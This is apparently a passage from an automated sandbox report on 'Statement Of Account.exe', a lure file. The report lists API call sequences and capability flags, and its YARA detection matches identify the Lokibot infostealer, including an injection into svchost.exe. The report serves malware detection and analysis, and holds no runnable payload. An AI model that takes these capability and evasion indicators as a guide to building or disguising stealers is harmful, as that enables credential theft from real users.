Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0047C08E SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx, 0_2_0047C08E
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_004331D9 ClientToScreen,NtdllDialogWndProc_W, 0_2_004331D9
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0047E1FA NtdllDialogWndProc_W, 0_2_0047E1FA
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0043323E NtdllDialogWndProc_W, 0_2_0043323E
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0046F2B0 DragQueryPoint,SendMessageW,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W, 0_2_0046F2B0
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0046F50B NtdllDialogWndProc_W,ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W, 0_2_0046F50B
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0045058D GetParent,NtdllDialogWndProc_W,NtdllDialogWndProc_W,NtdllDialogWndProc_W, 0_2_0045058D
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00469681 PostMessageW,GetFocus,GetDlgCtrlID,PostMessageW,NtdllDialogWndProc_W,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W, 0_2_00469681
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0046F749 NtdllDialogWndProc_W, 0_2_0046F749
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00447870 GetCursorPos,TrackPopupMenuEx,NtdllDialogWndProc_W,GetCursorPos,TrackPopupMenuEx, 0_2_00447870
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0044782B NtdllDialogWndProc_W, 0_2_0044782B
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0044096A NtdllDialogWndProc_W, 0_2_0044096A
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0044796B GetClientRect,GetCursorPos,ScreenToClient,WindowFromPoint,NtdllDialogWndProc_W, 0_2_0044796B
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00440938 NtdllDialogWndProc_W, 0_2_00440938
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00469995 NtdllDialogWndProc_W,NtdllDialogWndProc_W, 0_2_00469995
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0044099C NtdllDialogWndProc_W, 0_2_0044099C
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00440ADF NtdllDialogWndProc_W, 0_2_00440ADF
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00447A87 SendMessageW,NtdllDialogWndProc_W, 0_2_00447A87
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00447B15 NtdllDialogWndProc_W, 0_2_00447B15
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00440B39 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W, 0_2_00440B39
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00454C69 NtdllDialogWndProc_W, 0_2_00454C69
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00454C1B NtdllDialogWndProc_W, 0_2_00454C1B
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00461EB0 NtdllDialogWndProc_W,NtdllDialogWndProc_W, 0_2_00461EB0
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00401108 NtdllDefWindowProc_W, 3_2_00401108
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0047C08E SendMessageW,NtdllDialogWndProc_W,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,SetCapture,ClientToScreen,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 3_2_0047C08E
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0040116E NtdllDefWindowProc_W, 3_2_0040116E
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00401108 NtdllDefWindowProc_W, 3_2_00401108
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_004331D9 ClientToScreen,NtdllDialogWndProc_W, 3_2_004331D9
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0047E1FA NtdllDialogWndProc_W, 3_2_0047E1FA
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0043323E GetWindowLongW,NtdllDialogWndProc_W, 3_2_0043323E
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0046F2B0 DragQueryPoint,SendMessageW,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W, 3_2_0046F2B0
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0046F50B NtdllDialogWndProc_W,ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W, 3_2_0046F50B
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0045058D GetParent,NtdllDialogWndProc_W,NtdllDialogWndProc_W,NtdllDialogWndProc_W, 3_2_0045058D
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00469681 PostMessageW,GetFocus,GetDlgCtrlID,PostMessageW,NtdllDialogWndProc_W,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W, 3_2_00469681
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0046F749 NtdllDialogWndProc_W, 3_2_0046F749
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00447870 GetCursorPos,TrackPopupMenuEx,NtdllDialogWndProc_W,GetCursorPos,TrackPopupMenuEx, 3_2_00447870
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0044782B NtdllDialogWndProc_W, 3_2_0044782B
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0044096A NtdllDialogWndProc_W, 3_2_0044096A
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0044796B GetClientRect,GetCursorPos,ScreenToClient,WindowFromPoint,NtdllDialogWndProc_W, 3_2_0044796B
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00440938 NtdllDialogWndProc_W, 3_2_00440938
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00469995 NtdllDialogWndProc_W,NtdllDialogWndProc_W, 3_2_00469995
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0044099C NtdllDialogWndProc_W, 3_2_0044099C
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00440ADF NtdllDialogWndProc_W, 3_2_00440ADF
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00447A87 SendMessageW,NtdllDialogWndProc_W, 3_2_00447A87
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00447B15 NtdllDialogWndProc_W, 3_2_00447B15
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00440B39 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W, 3_2_00440B39
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00454C69 NtdllDialogWndProc_W, 3_2_00454C69
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00454C1B NtdllDialogWndProc_W, 3_2_00454C1B
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00461EB0 NtdllDialogWndProc_W,NtdllDialogWndProc_W, 3_2_00461EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00122720 RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegCloseKey,HeapAlloc,RegQueryValueExW,ExpandEnvironmentStringsW,LCMapStringW,RegQueryValueExW,HeapFree,AcquireSRWLockShared,ReleaseSRWLockShared,HeapAlloc,memcpy,memcpy,AcquireSRWLockExclusive,ReleaseSRWLockExclusive,RegGetValueW,ActivateActCtx,LoadLibraryExW,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,RegCloseKey,HeapAlloc,RegGetValueW,WideCharToMultiByte,HeapAlloc,WideCharToMultiByte,HeapFree,ExpandEnvironmentStringsW,HeapFree,CreateActCtxW,GetLastError,HeapFree,HeapFree,GetLastError,CreateActCtxW,GetLastError,ReleaseActCtx,GetLastError,GetLastError,RtlNtStatusToDosError,GetLastError,LoadLibraryExW,RtlNtStatusToDosError,LoadLibraryExW,RtlNtStatusToDosError,HeapFree,ReleaseActCtx, 10_2_00122720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00123540 RtlImageNtHeader,RpcMgmtSetServerStackSize,I_RpcServerDisableExceptionFilter,RtlSetProcessIsCritical,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProtectedPolicy,HeapSetInformation,NtSetInformationProcess, 10_2_00123540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_001233C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode, 10_2_001233C0
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 0_2_00434D50
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,74AE5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle, 0_2_004461ED
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004364AA
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 3_2_004364AA
Detected potential crypto function
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00409A40 0_2_00409A40
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00412038 0_2_00412038
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00427161 0_2_00427161
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0047E1FA 0_2_0047E1FA
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_004212BE 0_2_004212BE
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00443390 0_2_00443390
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00443391 0_2_00443391
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0041A46B 0_2_0041A46B
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0041240C 0_2_0041240C
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00446566 0_2_00446566
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0041D750 0_2_0041D750
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_004037E0 0_2_004037E0
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00427859 0_2_00427859
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00412818 0_2_00412818
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0040F890 0_2_0040F890
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0042397B 0_2_0042397B
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00411B63 0_2_00411B63
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0047CBF0 0_2_0047CBF0
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00412C38 0_2_00412C38
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00423EBF 0_2_00423EBF
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_00424F70 0_2_00424F70
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_0041AF0D 0_2_0041AF0D
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 0_2_03E4F238 0_2_03E4F238
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00409A40 3_2_00409A40
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00412038 3_2_00412038
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00427161 3_2_00427161
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0047E1FA 3_2_0047E1FA
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_004212BE 3_2_004212BE
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00443390 3_2_00443390
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00443391 3_2_00443391
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0041A46B 3_2_0041A46B
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0041240C 3_2_0041240C
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00446566 3_2_00446566
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0041D750 3_2_0041D750
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_004037E0 3_2_004037E0
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00427859 3_2_00427859
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00412818 3_2_00412818
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0040F890 3_2_0040F890
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0042397B 3_2_0042397B
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00411B63 3_2_00411B63
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0047CBF0 3_2_0047CBF0
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00412C38 3_2_00412C38
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00423EBF 3_2_00423EBF
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_00424F70 3_2_00424F70
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_0041AF0D 3_2_0041AF0D
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 3_2_03D5C228 3_2_03D5C228
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 5_2_03C7E608 5_2_03C7E608
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 7_2_03E2C238 7_2_03E2C238
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: 9_2_03D7C600 9_2_03D7C600
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_00122720 10_2_00122720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0040549C 10_2_0040549C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_004029D4 10_2_004029D4
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0041219C appears 45 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00405B6F appears 42 times
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: String function: 00425210 appears 58 times
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: String function: 00445975 appears 130 times
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: String function: 0041171A appears 74 times
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: String function: 0041832D appears 52 times
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: String function: 004136BC appears 36 times
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: String function: 004092C0 appears 50 times
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: String function: 0041718C appears 90 times
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: String function: 00401B70 appears 46 times
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: String function: 0040E6D0 appears 70 times
Source: C:\Users\user\Desktop\Statement Of Account.exe Code function: String function: 0043362D appears 38 times
Sample file is different than original file name gathered from version info
Source: Statement Of Account.exe, 00000000.00000003.2057153434.0000000004443000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000000.00000003.2057331702.00000000045ED000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000003.00000003.2076232041.0000000004353000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000003.00000003.2077015331.00000000044FD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000005.00000003.2101916885.000000000450D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000005.00000003.2101706844.0000000004363000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000007.00000003.2120319817.0000000004423000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000007.00000003.2119966294.00000000045CD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000009.00000003.2137835817.0000000004423000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe
Source: Statement Of Account.exe, 00000009.00000003.2138006449.00000000045CD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Statement Of Account.exe
Uses 32bit PE files
Source: Statement Of Account.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Yara signature match
Source: 3.2.Statement Of Account.exe.2fb0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.2.Statement Of Account.exe.2fb0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.2.Statement Of Account.exe.2fb0000.1.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.Statement Of Account.exe.2fb0000.1.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Statement Of Account.exe.b80000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.Statement Of Account.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Statement Of Account.exe.3a20000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Statement Of Account.exe.b80000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Statement Of Account.exe.b80000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Statement Of Account.exe.b80000.1.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Statement Of Account.exe.b80000.1.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
